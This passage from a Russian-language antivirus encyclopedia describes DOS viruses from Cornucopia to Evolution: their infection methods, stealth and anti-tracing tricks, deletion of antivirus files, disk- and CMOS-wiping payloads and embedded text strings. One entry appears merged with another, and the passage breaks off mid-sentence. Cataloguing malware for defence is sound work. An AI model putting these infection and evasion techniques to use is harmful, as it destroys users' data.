Неопасный резидентный полиморфный вирус. Удаляет файл CHKLIST.MS. Примерно через 4 месяца после заражения файла вирус записывает в конец файла C:\AUTOEXEC.BAT текст:
@Echo Virus "EL MOSTRO CORDOBES".
@Echo No tema por sus datos. Que pase un buen dбa.
@Echo.
@Pause

Cornucopia

Неопасный нерезидентный вирус-спутник. Упакован утилитой PKLITE 1.14. Производит поиск и заражение COM и EXE-файлов на всех доступных дисках. При заражении файла, переименовывает оригинальный файл, создавая ему имя, отличное от настоящего имени только последним символом. К последнему символу имени файла вирус прибавляет единицу (для кода ASCII). Например, если имена файлов были FILE.EXE и 00000.COM, то вирус переименует данный файлы в FILF.EXE и 00001.COM соответственно. После этого вирус заново создает файл с оригинальными именем и длиной и записывает в него свой код. По окончании своей "работы" вирус пытается запустить оригинальный файл. Если данный файл не будет найден, то вирус выводит сообщение "Unknown command", после чего выводит имя истинного зараженного файла. При трассировке кода вируса, вирус может удалить файл, содержащий данный код на диске. Содержит тексты:
C:\*.* .COM .EXE
PROT SCAN VIRU NAV MZ
This is a SIMUTATED VIRUS for testing.
Copyright Rosenthal Engineering 1991

CorpLife.1929, 1937

Неопасные резидентные полиморфные вирусы. При заражении EXE-файлов используют FCB-функции. Если на компьютере имеется Sound Blaster со speech-драйвером, то вирус передает этому драйверу текстовую строку "Fuck Corporat Life.". Вирусы также содержат строку "$B -=[$$$ Corporate Life $$$]=- P$".

Cossiga.859

Опасный нерезидентный вирус. Может уничтожить содержимое первых 9ти секторов 39 цилиндров первого жесткого диска. После чего выведет текст "TE LO SEI PRESO NEL CULO !".

Cpsu.680

Устраивает видеоэффект: четные строки экрана движутся в одну сторону, нечетные - в другую. Содержит текст "Long live CPSU".

Cpw.1459

Опасный резидентный вирус. Изменяет вводимые символы с клавиатуры, 27 мая выводит текст "нFeliz cumpleaдos CPW!. Содержит строку имен файлов, которые вирус не заражает, но может и удалить любой из них: "МОCNCGUARDEMSCPAVSCANCLEANFINDVIRUCHKVIRUS". Содержит также тексты "Este programa fue hecho en Chile en 1992 por CPW.", "C:\COMMAND.COM", "You are here CPW!".

Cpw.1527

Опасный резидентный шифрованный вирус. 11 сентября, 28 декабря, 27 мая удаляет файлы. Содержит текстовые строки:
CPW fue hecho en Chile en 1992, нVIVA CHILE MIERDA!
C:\COMMAND.COM
GUARD guard CPAV SCAN CHKVIRUS CLEAN TOOLKIT VSAFE CHKLIST.CPS
Вирус удаляет файлы, обозначенные в последней текстовой строке.

Crazy.1402, Crazy.1445

Неопасные стелс-вирусы. Перехватывают INT 1Ch, INT 21h. В памяти хранят две свои копии. При каждом вызове INT 1Ch (таймер) вирусы копируют "пассивную" копию в "активную", предохраняя, т.о., свой код от трассировки и от обезвреживания активной TSR-копии в памяти.

CrazyBoot

Неопасный стелс boot-вирус. При 8995ой загрузке с инфицированного диска(!!!) выводит текст: Don't PLAY with the PC ! Otherwise you will get in 'DEEP,DEEP' trouble !... Crazy Boot Ver. 1.0

Crepate.2910

Очень опасный полиморфный файлово-загрузочный вирус. При первом старте инфицированной программы заражает MBR жесткого диска, причем если зараженная программа была запущена с гибкого диска, то вирус сохраняет не оригинальный MBR, а boot-сектор флоппи-диска. Восстановить истинный MBR в данном случае невозможно. При загрузке системы с жесткого диска вирус устанавливает свою TSR-копию, перехватывает INT 1Ch, ждет установки DOS, после чего перехватывает INT 21h. В зависимости от системного времени вирус может переформатировать "винчестер". Содержит текстовые строки: "COMcomEXEexeOV?ov?", "Crepate ©1992/93-Italy-(Pisa)", "Crepa© bye R.T.!".

CriCri.4300, 4616

Опасные резидентные полиморфные вирусы. Заражают загрузочные сектора дискет и COM, EXE - файлы. При заражении из-за ошибки могут портить файлы. 4 июня выводят на экран текст "Cri-Cri ViRuS by Griyo/29A ... Tried, tested, not approved." и "вешают" систему. Не заражают файлы, в именах которых присутствуют цифры или буква "V".

Cruel (1,2)

Опасные загрузочные вирусы. Заражают Boot-сектора дисков при каждом 40 обращении к диску на чтение или запись. 8 числа месяца при значении минут равным 47 вирусы уничтожают содержимое CMOS-памяти.Содержат текст "CRUE(L)".

Crusher

Неопасный файлово-загрузочный вирус. Заражает MBR жесткого диска и EXE- файлы при копировании, внедряя свой код в их начало. Если не хватает памяти при установке вирусом своей TSR-копии, то вирус выводит сообщение "Insufficient memory".

Cunning.1997

Неопасный резидентный вирус. При первом старте пытается заразить командный процессор, указанный через переменную COMSPEC и C:\COMMAND.COM. После чего удаляет вирусный код из стартовавшей программы. При старте инфицированного командного процессора устанавливает в память свою резидентную копию. При старте программ ARJ.EXE, RAR.EXE или AIN.EXE вирус заражает все открываемые COM-файлы, а при их закрытии - удаляет из них вирусные коды. Т.о., все COM-файлы, во вновь созданных архивах ARJ, RAR или AIN, оказываются инфицированными. При старте программы ADINF.EXE вирус удаляет свой код из COMMAND.COM.

Cvka.1024

Неопасный резидентный шифрованный вирус. Блокирует нажатие на клавиши Caps Lock и правый Shift. Содержит тексты "Cheboksary-90", "CVKA".

Cyanide.705

13 числа месяца устанавливает системную дату на 14 число и выводит текст
Goodday.. I am da Sparkling Cyanide fear, however, no need to vir.. 'coz I do NOT have a bomb like al those childish fears. On da contrary.. I've set your date to tomorrow, So all the other fears haven't got a chance.. Aren't you glad you ran me first?
SPARKLING CYANIDE © [VooDoo]

Cybercide.2299

Очень опасный резидентный вирус. Перехватывает INT 09, 1Ch, 21h. При вводе с клавиатуры слова "anoi" вирус добавляет строку "iS AROUND!". При нажатии на клавиши Alt+Del вирус выводит по всем углам экрана буквы "A", "N", "O", "I". В зависимости от системного времени вирус уничтожает содержимое случайных секторов диска, записывая в них строку ">>> A.N.O.I <<<", или рисует шведский желтый крест на синем фоне, или проигрывает мелодию.

0

4

D

DaBoys (1,2)

Опасные загрузочные вирусы. Не сохраняют оригинальные загрузочные сектора дисков. Содержат строку "DA`BOYS".

Dac.1582, 1600

Неопасные резидентные вирусы. Пытаются скрывать приращение своих длин, но делают это с ошибкой. После 47 заражений файлов выводят сообщения в режиме 40x25:
Dac.1582:
Do not interrupt; the D.A.C action. The ALIEN,v.1.0.1991y. I'm asked users to call author. L..bank. Simferopol-city. Written by M>2,F<2,T>2. Not destructs, but errors. Halt !.. Bye!
Dac.1600:
Do not interrupt; the D.A.C action. The FBARA v.1.4.1993y. I'm asked users to call author. Unknown. ..m.e..po.-c.ty. Written by M>3,F<2,T>2. Not destructs, but errors. Halt !.. Bye!
После чего "вешают" систему.

Daemaen.1894, Daemaen.2048

Неопасные файлово-загрузочные шифрованные вирусы. Заражают COM, EXE, BIN, OVL, SYS- файлы MBR жесткого диска и Boot-сектора дискет. Содержат строку "COMEXEBINOVLSYS". Daemaen.1894 содержит строку "SCCLVSF-". Daemaen.1894 не заражает программы, содержащие в своем имени первые 2 буквы из 8 символов данной строки. Также в теле вирусов имеются еще текстовые строки -
Daemaen.1894:
Cowboys From Hell/Vulgar Display of Power [Pantera] The best Power Metal band in the world. tHiS k0oL ViRUZ WaReZ bY [TДLФN<=>NЦKф] '93!
Daemaen.2048:
[DДeMЖИn] by TДLФN-{NЦKф}
Hugs to Sara Gordon
Hey John! If this is bad, wait for [VCL20]!
For Dudley
[VCL20с]/TДLФNшЛ

DAME-вирусы

DAME (Dark Angel Mutation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков.

DAME.Lame

Неопасный нерезидентный полиморфный вирус. Содержит текстовую строки: *.com .. This is a lame virus slapped together by DA/PS To demonstrate DAME 0.91

DAME.Trigger

Резидентный полиморфный вирус. Пытается найти в памяти и что-то сделать с какой-то резидентной программой. Трассирует INT 21h и "врезает" в оригинальный обработчик 5 байт прямого межсегментного перехода на свой код. Содержит текстовую строку:
Trigger by Dark Angel of Phalcon/Skism
Utilising Dark Angel's Multiple Encryptor (DAME)

Daniela

Опасный загрузочный вирус. 5 апреля уничтожает информацию на жестком диске. Содержит текст "EU TE AMO DANIELA".

Danish.284

Содержит текст:
*** NIGHTCRAWLER V 2.0 *** Written by the Weasel!
© Sector Infector Inc

Danish.Kennedy

6 июня, 18 и 22 ноября выводит текст "Kennedy er dЫd - lСnge leve "The Dead Kennedys"".

DarkAngel.3250

Опасный резидентный полиморфный вирус.Содержит в своем теле загрузочный вирус DarkAngel, описанный выше. Иногда DarkAngel.3250 заражает MBR жесткого диска вирусом DarkAngel, который в последствии "живет самостоятельной жизнью". DarkAngel.3250 содержит тексты "D.Angel", "Copyright © Dark Angel Corp 1992-1993.".

Day14.789, 792

Опасные нерезидентные вирусы. 14 или 24 числа месяца уничтожают содержимое CMOS памяти и MBR (или 256 секторов первого жесткого диска - Day14.792).

Dead.852

Неопасный резидентный вирус. Во втором и девятом часах издает звуковые сигналы. Не заражает файлы, имена которых начинаются на AI, WE, DR.

Dead.1362, 1364

Очень опасные резидентные вирусы. Ведут счетчик заражений внутри файлов. При счетчике более 255 вирусы уничтожают содержимое диска D:. Содержат строку "COMSPEC".

Debilas.2000

Опасный резидентный вирус. В сентябре после 22 числа уничтожает содержимое 128 секторов каждого логического устройства жесткого диска и выводит текст:
-=DMS=-
Fuck you b.tAMULYNAS and to your crack of Print_Screen
Buvai DEBILAS , esi DEBILAS ir busi DEBILAS !!!
Copy right Antanas Vidziunas ,VDU, 1996.
Не заражает файлы, содержащие следующие сочетания: AI,CL,WE,AD,AN,SC,
V.,LD,PR,MM. Содержит зашифрованный текст "I `LL BE IN KTU SOMEDAY".

DecMem

Неопасный загрузочный вирус. При заражении загрузочных секторов флоппи- дисков запоминает системную дату в своем теле. При загрузке системы с такого диска и несовпадении значения запомненной даты и системной,вирус записывает в данный загрузочный сектор новую дату и увеличивает на 1Kb значение "отрезаемой у DOS" резидентной копией вируса количества доступной памяти.

Deicide.520

Опасный резидентный вирус. 13 числа месяца любой символ, выводимый на печать, меняет на символ "6". Содержит тексты "666", "DEICIDE".

Dennis.539, 656, 689, 1000

Неопасные резидентные вирусы. Dennis.656 20 июня производит всяческие манипуляции с клавиатурой (байт по адресу 0040:0017h), Dennis.689 при выводе на печать вставляет перед каждым выводимым символом команды, попеременно изменяющие верхний и нижний регистр букв. Dennis.689 содержит текст "v1.0(CrazyPrinter)ByDennisDavydov", Dennis.1000 имеет зашифрованный текст "execomыD.Davydov".

Demiurg.3061

Опасный резидентный файлово-загрузочный вирус. "Перехватывает" INT 13h, 2Ah, 0CEh, 0E0h. При открытии файла A-Dinf-°.°°°, вирус производит подсчет CRC в некоторой области памяти (?) и удаляет свой код из секторов диска, но MBR не перезаписывает, в результате чего система повиснет при загрузке с такого диска. Работоспособен только в DOS версиях 6.xx. Содержит тексты:
Мир вам.Меня зовут Demiurg.Я хранитель врат,врат Ада.
Все кто хочет увидеть Хозяина встречается со мной,а кто
встречается со мной попадает к Хозяину...мертвым.
Тупые охотники за головами,с притензией на интеллект
гадатели,всезнающие визири-многие пытались увидеть
меня,но порой их глаза были ослеплены,а ум нашептывал
соблазнительное OK
LORD

Democracy.3806

Неопасный резидентный вирус. Иногда выводит следующие сообщения:
Please answer:
OK!
Don't forget June Fourth!
I agree
I have not ANY side effect.
ANY cleaning action will make servere result.
You don't answer correctly, once again.
Democracy

Demon.4313, 4767, 5670

Опасные резидентные шифрованные вирусы. Удаляют файлы: SCAN.DAT, SIGN.DEF, TBAV.KEY, TBSCAN.SIG, Anti-vir.dat, chklist.ms. При попытке заражения файла на защищенном от записи диске вирусы выводят сообщения:
Demon.4767 -
Disk is Write Protected Please Unprotect it and Press Any Key When Ready
Demon.5670 -
Disk is Write Protected Please Unprotect it AND Press any key to continue . . .
После чего ждут нажатия на клавишу и Demon.4767 выводит сообщение:
Thank-You, Please Wait...
Demon.4313 содержит строку "[demon4]structor.264 6 числа после 12.00 выводит текст "Destructor, Copyright © 1992 by Krasikov".

Device.2000

Неопасный резидентный вирус. Заражает EXE и SYS-файлы. Для EXE-файлов является полиморфным вирусом. При старте инфицированного EXE-файла, вирус производит поиск в файле C:\CONFIG.SYS текстовых строк "DEVICE". При нахождении такой строки вирус пытается заразить файл (если он в формате SYS), указанный через данную переменную "DEVICE". Вирус создает файл C:\devices.$$$, записывает в него 2000 байт своего кода, затем записывает содержимое оригинального SYS-файла, удаляет SYS-файл-жертву и присваивает файлу C:\devices.$$$ имя данного файла. При загрузке такого инфицированного SYS-файла вирус "перехватывает" INT 1Ch(таймер). При определенных обращениях к таймеру вирус проверяет есть ли обращение к флоппи-дискам (включен ли мотор дисководов) и пытается найти и заразить EXE-файлы.

DieLamer.1090

Опасный резидентный вирус. Уничтожает файлы smartc*.cps и chklist.*. Если идет вывод строки "-=*@DIE_LAMER@*=-" через INT 10h, то вирус уничтожает содержимое секторов диска B:. Содержит строку "VLamiX-1".

Digger.1475 (1,2), 1512, 1800

Оставляют в памяти резидентную программу, которая переворачивает экран. Содержат строку "© DIGGER".

Digital.3547

Опасный резидентный полиморфный вирус. 28 мая уничтожает содержимое секторов на 32 головках 20 дорожках первого жесткого диска, записывая в данные сектора повторяющуюся строку "DIGI",после чего перепрограммирует знакогенератор, проигрывает мелодию и выводит текст.

Dima.325

Содержит текст "Dima".

Dinamo

Если в процессе загрузки с инфицированного диска произойдет ошибка чтения, то вирус выводит на экран фразу "Dinamo(Kiev)-champion !!!".

Dir-II (1-7)

Неопасные (Dir-II (5) - опасен ) резидентные вирусы, встраивающиеся в цепочку дисковых драйверов. Записывают свой код в последний кластер диска. Для файлов с расширениями COM и EXE устанавливают указатели первого кластера данных на данный последний кластер диска, содержащий вирусный код. Dir-II (5) уменьшает длину файлов с расширением DBF на 256 байт и удаляет файлы, начинающиеся на AIDS или ADIN.

Dmr.1200 (1,2)

Неопасные резидентные вирусы. 13 числа выводят на экран тексты:
DMR, Pantera & Ale Forever !
D M R F o r e v e r !
Dis iz ChaosTraveller ver. 2.0
Nightmare, yeah ? Try to be clean !
Suck off, fucksider ! Today`s 13th !
Virus "CHAOS TRAVELLER".
Made by MegaMind,Murmansk,RUSSIA,1996.
This is only test.Prepare for my next virus.
I will turn you life into nightmare !
Ha-ha-ha-ha-ha-ha-ha-ha !!!

Dnepr.377

Неопасный резидентный вирус. Периодически выводит на экран текст "DNEPR-CHAMPION".

Dodgy

Опасный загрузочный стелс-вирус. Перехватывает INT 13h, 21h, 2Fh, 40h. Удаляет файл SYSTEM\IOSUBSYS\HSFLOP.PDR. 28 числа может уничтожить содержимое секторов дискет и вывести текст "RAVage is wiping data! RP&muRphy".

Donbass.444

Неопасный нерезидентный вирус. Первым делом пытается заразить командный процессор, указанный через переменную среды COMSPEC. Содержит текст "Donbass3".

Doom.666

Неопасный резидентный вирус. Содержит текст: DOOM2.EXE Illegal DOOM II signature Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2 Say bye-bye HD The programmer of DOOM II DEATH is in no way affiliated with ID software. ID software is in no way affiliated with DOOM II DEATH.

Doom.752

Очень опасный нерезидентный вирус. 8 числа любого месяца пытается уничтожить 320 секторов дисков C: и D:, после чего выводит сообщение:
DOOM I. Greetings from National Central University !

DotEater.944 (1-3)

Неопасные резидентные вирусы. Первым делом пытаются заразить командный процессор, указанный через переменную COMSPEC. Могут оставить в памяти резидентный код "на клавиатуре INT 16H", который в зависимости от нажимаемых клавиш "запускает" по 25 строке экрана "рожицу", ASCII символ - 1. "Рожица" во время своего движения "издает" жужжание.

Dotter.3961, 4611

Неопасные резидентные шифрованные вирусы. Иногда могут вывести на экран одно из приведенных ниже высказываний:
"Не богатей дуpными сpедствами" (Фалес).
"Чем поддежал ты своих родителей, такого жди и от детей" (Фалес).
"Заводи друзей не спеша, а заведши, не бросай" (Солон).
"Не злословь о ближнем, чтобы не услышать такого, чему сам не порадуешься" (Хилон из Спарты).
"Что лучше всего? Хорошо делать, что делаешь" (Питтак)
"Только больная душа может быть глуха к чужой беде" (Бинат).
"Цивилизация - это совокупность духовных, материальных и нравственных средств, которыми данное сообщество вооружает своего члена в его противостоянии внешнему миру" (М.Барг).
"Если для создания социализма требуется определенный уровень культуры... то почему нам нельзя начать сначала с завоевания революционным путем предпосылок для этого определенного уровня, а потом уже, на основе рабоче-крестьянской власти и советского строя, двинуться догонять другие народы" (В.Ленин).
"Пришло несчастье - человек сам его породил, пришло счастье - человек сам его вырастил. У несчастья и счастья одни двери, польза и вред - соседи" (Конфуций).
"Мир - это священный сосуд, которым незьзя манипулировать. Если кто хочет манипулировать им, уничтожит его" (Дао) .
Запад есть Запад, Восток есть Восток, не встретиться им никогда.
Лишь у подножья Престола Божья в день Страшного Суда. (Р.Киплинг)
"Кто покупает ненужное, тот скоро продаст необходимое" (Б.Франклин).
"Помните, что время - это деньги" (Б.Франклин).
"Следуй pеке, начиная с ее истоков. Истина сегодня-завтpа окажется ложью" (Ф.Паулюс).
"За ошибки госудаpственных деятелей pасплачивается вся нация" (Н.Беpдяев).
Весь мир - театр.
А в нем женщины, мужчины - все актеры.
У них есть выходы, уходы.
И каждый не одну играет роль.
Семь действий в пьессе той.
Младенец, школьник,юноша, любовник,
Солдат, судья, старик. (Шекспир)
- "Человеческое достоинство нерушимо.Уважать и защищать его - обязанность всякой государственной власти" (Конституция ФРГ, ст. # 1)
- "Государственная власть основывается на непоколебимим доверии народа, ее авторитет исходит от народа, ее полномочия осуществляются посредством народа, а благами ее пользуется народ" (из Конституции Японии)
- "Вся власть в СССР принадлежит народу" (Конституция СССР 1977 г., ст. 2)
"Неча на зеркало пенять, коль рожа крива" (про тебя)

Dracula.1370

Очень опасный резидентный вирус. При старте инфицированного файла, вирус удаляет свой код из него. При значении минут системного времени кратного 10 и при возникновении ошибки во время самостоятельного "излечения" файлов, вирус уничтожает содержимое первого жесткого диска и выводит текст "It's a pleasure for me to be so harmful. See you later, Count DRACULA.".

Dragon

Неопасный загрузочный стелс-вирус. При трассировке резидентной копии вируса, происходит "зависание" системы и возможна в этот момент "рябь" на экране монитора.

DrDemon.4292

Неопасный файлово-загрузочный полиморфный вирус. Не заражает файлы, начинающиеся на буквосочетания AIDS, WEB, VB, ADINF, SCAN, CLEAN, DRW. Содержит зашифрованный текст "MB Pro © 1994-96 by Dr.Demon".

Drdr.1141

Опасный нерезидентный вирус. Оставляет в памяти резидентный код, который уменьшает размер свободной DOS-памяти. Содержит текст "Dr&dR © SizOrtSoft L.T.D. 10-10-93".

Dre.192

Опасный замещающий программный код вирус. Заражает EXE-файлы в текущем каталоге, записываясь в их начало. Содержит тексты "Я вирус?EXE" и "Wr. by Doctor Dre 1997©.King V1.2".

Dre.756

Опасный нерезидентный шифрованный вирус. Заражает COM и EXE-файлы в текущем каталоге. Причем EXE-файлы Dre.756 заражает вирусом Dre.192, которого носит в своем теле.

Dream

Неопасный загрузочный стелс-вирус. Копирует 101 байт своего кода в таблицу векторов прерываний. При чтении первых секторов дискет вирус читает в область видеопамяти инфицированный MBR жесткого диска и записывает его в загрузочный сектор флоппи-диска. Содержит строку "dream".

DREG.based

Данные вирусы сконструированы с помощью вирусного конструктора DREG (Digital Hacker's Alliance Randomized Encryption Generator), позволяющего создавать нерезидентные полиморфные вирусы, заражающие COM-файлы в текущем каталоге.

Dret.1710

Очень опасный резидентный полиморфный вирус. 13 числа или при неаккуратной трассировке вирус может уничтожить по 128 секторов на первом и втором жестких дисках. Содержит текст
"© 23.5.3945 / DR & ETASCECLHVSPF-ACPRVINWI".

DrJohn.2000

Неопасный резидентный вирус. На следующий месяц после заражения выводит на экран текст "Пpивет от *Doctor John*! Пpиятель, да ты оказывается чайник последний !". Имеет текст "Данные из заголовка EXE".

Dron.995, Dron.1024

Содержат текстовую строку "* DRON Ver 1.00, PhysTech,© 1994 *". Иногда выводят на экран текст:
Moscow Institute of Physics and Technology © 1994

DrWhite.1027

Файлово-загрузочный шифрованный вирус. При старте инфицированного файла вирус заражает MBR, изменяя 34 его байта. Записывает на диск еще 2 сектора своего тела. При перезагрузке системы инсталлируется в память и перехватывает INT 13h, INT 1Ch, INT 21h. В дальнейшем заражает Boot-сектора флоппи-дисков и COM-файлы. Содержит текстовые строки: "Dr White - Sweden 1994" и "Junkie Virus - Written in Malmo...M01D".

DrWhite.2403

Опасный резидентный полиморфный вирус. Уничтожает файлы CHKLIST.MS. Содержит текстовые строки: "DrW-2", "Dr White - Sweden 1993" и "Desperado Virus - Written in Malmo...F02E".

DSCE-вирусы

DSCE (Dark Slayer Confusion Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан китайским вирусописателем по "кличке" Dark Slayer.

DSME-вирусы

DSME (Dark Slayer Mutation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан китайским вирусописателем по "кличке" Dark Slayer.

DSME.Connie.1761, DSME.Connie.2708

Полиморфики. Первым делом пытаются заразить файл COMMAND.COM в корневом директории диска C:. Содержат текстовые строки:
DSME.Connie.1761 - "This is Written by Dark Slayer in
Keelung TAIWAN".
DSME.Connie.2708 - "This is Connie v2.0 Written by Dark Slayer in
Keelung, Taiwan".

Dsu.1414

Опасный зашифрованный вирус. После 25 числа месяца перехватывает INT 17h (принтер) и при выводе на печать меняет русскую букву 'р' на 'г'. Содержит текст "© 1994 DSU RadioFuck".

Dumb.4722

Неопасный резидентный полиморфный вирус. После 6500 нажатий на клавиши вирус выводит текст:
I'm the first version of the first Romanian Polimorphic Virus.
Because I was borned in Romania, all the talking from now-on
will be in my language.
--DECI-- sa ne intelegem romaneste ca de la virus la posesor de virus :
Ma lasi sa traiesc linistit, te las sa traiesti linistit !
De acord ? "DWBoMK" МИСиС,ПМП,ТЭМ-96-1" и уничтожает содержимое первого
жесткого диска.

0

5

E

EA.Asmodeous.882, 1160, 1343, 1359, 1437, 1450, 1829, 1833

Опасные резидентные вирусы. Вирусы состоят из 10 составных частей, 9 из которых вирусы при заражении файлов меняют местами в случайной последовательности. 11 ноября вирусы пытаются удалить все файлы, поиск которых производится посредством функций 4Eh, 4Fh INT 21h. Содержат строку "ASMODEOUS" или "Asmodeous".

EA.Asmodeous.1444

Очень опасный вирус. Вирус состоит из 16 составных частей, 15 из которых вирус при заражении файла меняет местами в случайной последовательности. Первым делом вирус пытается заразить командный процессор, считая, что он должен быть обязательно в формате COM-файла. При заражении COM-файлов, первая инструкция которых JUMP, вирус внедряет 8 байт команд своего перехода в область второй ассемблерной инструкции. Если же у COM-файла первая команда не JUMP, то вирусу не удается заразить такой файл из-за ошибки, и система, как правило, "зависает". 27 декабря вирус пытается уничтожить содержимое 15 первых секторов жесткого диска. Удаляет программу AIDSTEST.EXE при ее запуске. Вирус перехватывает INT 17h (принтер) и при печати выводит слова, отсутствующие в нормативной лексике. При заражении командного процессора вирус выводит сообщение "HS86.5 Ver 5.09.Copyright by EA computers inc.1994". Содержит строку "SNAIDSTESTCOMEXE".

EA.Hs

Опасный резидентный вирус. "Перехватывает" INT 17h, 21h. При печати на принтере вставляет после запятой одно из следующих словосочетаний: ",вот", ",коpоче", ",таво этава". Может вывести на экран текст "HS86.42 Ver 4.09.Copyright by EA computers inc.1994".

EA.Satana.665, 666

Опасные резидентные вирусы. 11 ноября записывают во все запускаемые программы строку "Сатана там правит бал". Содержат также текст "SATANA 666 © EA inc.".

Ear.Leonardo

Опасный нерезидентный шифрованный вирус. В зависимости от своих счетчиков может удалить все файлы в текущем директории, файлы c:\autoexec.bat и c:\config.sys, или записать в начало файла c:\io.sys текст "Leonardo v 2.0".

Ear.Shame

Опасный нерезидентный шифрованный вирус. Пытается удалить файлы TBSCAN.EXE, ANTI-VIR.DAT, CHKLIST.MS, CHKLIST.CPS, IVB.NTZ. Иногда выводит на экран одно из следующих сообщений:
Shame on you!
Where did I come from?
Dedicated to the people of Chung-Li, Tiawan.
I feel safe, don't you?
Dope!
Tiwanese rise to the top while looking down at the empty bottom...
Wait for the departure of you life...
God loves you!
Ur virux protexion sux.
It's a Shame.

Eddie.1530

Опасный резидентный вирус. Иногда "вешает" систему и изменяет тип диска в CMOS-памяти.

Eddie.1800 (1-3)

Очень опасные резидентные вирусы. Производят запись в случайные сектора текущего диска 512 байт своего кода. Перехватывают INT 21h, 27h. Не дают изменить адрес вектора INT 21h. INT 27h используется для контроля за INT 21h. Первоначальный вариант вируса содержал текстовые строки:
Eddie lives...somewhere in time!
Diana P.
This program was written in the city of Sofia © 1988-89 Dark Avenger

Ekaterinburg

19 августа выводит на экран бело-сине-красный российский флаг. Содержит свое зашифрованное название - Ekaterinburg.

Elaine.1127

Опасный резидентный вирус. "Перехватывает" INT 13h, 21h. С вероятностью 1/256 инвертирует первый байт в буфере при записи на диск (f.03h, f.0bh Int 13h). Содержит текст "Elaine 1.0 28 May 1994".

Elcn.374, 424, 550

Неопасные нерезидентные вирусы (Elcn.550 - опасен). Elcn.374 в 8:20 выводит текст "Лозинский - ЛОСЬ !!!". Elcn.424 выводит текст "Ты за Ельцина [y/n] ?" и в зависимости от ответа выводит одно из сообщений "Значит ты ублюдок !", "Я тоже.". Elcn.424 содержит текст "Bryansk ELCN", Elcn.550 - "Bryansk DRxy". Elcn.550 может уничтожить начальные сектора дисков. Может вывести текст:
NO ROM BASIC
SYSTEM HALTED.

Em.1303

Опасный нерезидентный вирус. Заражает EXE-файлы на диске C:. При старте инфицированного EXE-файла, вирус записывает в файл C:\AUTOEXEC.BAT после переменной среды "PATH=..." слово "em", создает файл C:\EM.COM и записывает в него свой вирусный код. При старте данного файла EM.COM вирус производит поиск и заражение EXE-файлов в каталогах диска C:. 28 числа вирус заменяет первый символ имен файлов диска C: на пробел.

Emmie.2604, Emmie.2620, Emmie.2702, Emmie.2823, Emmie.3097

Очень опасные вирусы. Emmie.2823, 3097 - самошифрующиеся вирусы. Трассируют INT 13h, 21h, 26h. Изменяют цифры, выводимые на экран или принтер. Повторяют символы, введенные с клавиатуры. Если год нечетный - уничтожают информацию на первых 17 секторах "винчестера" (Emmie.2823, 3097 - 8 марта если год нечетный). При заражении изменяют три байта второй ассемблерной инструкции программы-жертвы на команду перехода (CALL NEAR PTR) на основной вирусный код, который располагается в конце зараженного файла. Для определения адреса второй команды вирусы используют трассировку начальных байт программы. Содержат тексты: "My name is Emmie, I am Eddie's sister." и "It'll tire you too much.".

Emperor.FitW.7918 (1,2)

Очень опасный полиморфный файлово-загрузочный стелс-вирус. Данный вирус состоит, как бы, из двух частей. При запуске инфицированного файла, первым делом вирус заражает MBR жесткого диска (при наличии контроллера IDE, вирус программирует его порты при записи) и устанавливает свою резидентную копию в память (возможно в область UMB) и "перехватывает" INT 21h. При вызове некоторых функций INt 21h (4Ch, 4B00h, 3Dh, 3Eh) вирус производит полиморфное заражение COM и EXE-файлов. 1, 3, 5, 7 и 9 числа месяца вирусы блокируют клавиатуру (INT 9) и уничтожают содержимое всех жестких дисков. При нажатии на клавиши во время данной акции, вирус выводит текст:
The "FartStorm" coded by Demon Emperor >Big hello to Cmoskiller&Xorboot<
Are you wild? Hey don't... wait... let us talk... No? Be off lame fuckhead!
Инфицированный MBR и "вирусное продолжение",расположенное в 8 последних секторах жесткого диска не содержат процедур заражения файлов и могут заражать только загрузочные сектора дисков. При загрузке системы с инфицированного диска, вирус располагает свою копию в верхних адресах памяти, "ждет" загрузки DOS и "перехватывает" INT 13h (операции с диском). При обращении к дискам вирус заражает их. В MBR жесткого диска записывается полиморфнозашифрованный вирусный загрузчик. В загрузочные сектора дискет вирус записывает также полиморфный загрузчик, но только данный код не зашифрован, а "наполнен" "мусорными" инструкциями, т.е., "полезные" команды перемежаются "бесполезными" командами. 8 секторов своего кода и оригинальный загрузочный сектор флоппи-диска вирус записывает на дополнительную, отформатированную им, дорожку. Данные вирусы "переживают" перезагрузку системы с "чистой" системной дискеты, манипулируя с данными CMOS-памяти, также, как и вирус Mammoth.6000. Данные вирусы, видимо, принадлежат "перу" автора вируса Mammoth.6000. Вирусы содержат текст "Fart in the wind".

Enola.1183

Неопасный резидентный вирус. Устанавливает свою резидентную копию в верхние адреса памяти, "перехватывает" INT 21h, 27h, 2Fh, "ждет" вызова INT 27h или функции 31h INT 21h(завершить работу и остаться резидентно) и перемещает свой код в область памяти, следующей сразу за программой, остающейся резидентно в памяти. Препятствует работе MS-Windows в расширенном (enhanced mode) режиме. Содержит тексты "Enola Gay ver.2.01 © 1994 by HPR Lab.", "Accidents newer happen...".

ErasePT.512

Опасный нерезидентный вирус. Производит поиск и заражение *.EXE файлов на текущем диске, кроме флоппи-дисков. Внедряет в MBR код, который после 207 загрузок с жесткого диска уничтожает информацию о разделах жесткого диска (Partition Table). Исправление такого MBR не всегда представляется возможным.

Ester

Опасный загрузочный вирус.Оригинальный MBR жесткого диска не сохраняет. При заражении диска B: пытается произвести запись на диск A:.

Evc.161

Опасный резидентный замещающий вирус. 5 числа выводит текстовую строку
"MaKe ViRii oUT T aSS". Имеется также текст "EVC 1.0".

Evolution.2761, 2770

Очень опасные резидентные полиморфные стелс-вирусы. Размещают свою TSR- копию в области UMB или в верхних адресах основной памяти. Перехватывают INT 09, 13h, 21h. При каждом 256 вызове INT 13h с AH=2 (чтение секторов) или AH=3 (запись секторов) вирусы случайным образом изменяют случайный бит в буфере данных ES:BX. При открытии (f. 3Dh INT 21h) инфицированных файлов при активных резидентных вирусах, вирусы удаляют свой код из данных файлов, используя своеобразный стелс-алгоритм. Вирусы читают зараженный файл в память и трассируют инструкции полиморфного расшифровщика. После расшифровки вирусы устанавливают оригинальные, ранее зашифрованные, служебные значения заголовка EXE-файла и восстанавливают оригинальную длину файла. При закрытии (f. 3Eh INT 21h) данного файла вирусы снова заражают его. Вирусы используют команды 386 процессора. При установке своей резидентной копии вирусы проверяют - находится ли процессор в защищенном или реальном режимах работы. Если процессор работает в защищенном режиме, то вирусы пытаются устанавливать свою TSR-копию в область UMB или в верхние адреса памяти, как обычные резидентные вирусы. Если же i386 находится в реальном режиме работы (EMM386, QEMM, MS-Windows, OS/2,.. не установлены), то вирусы устанавливают 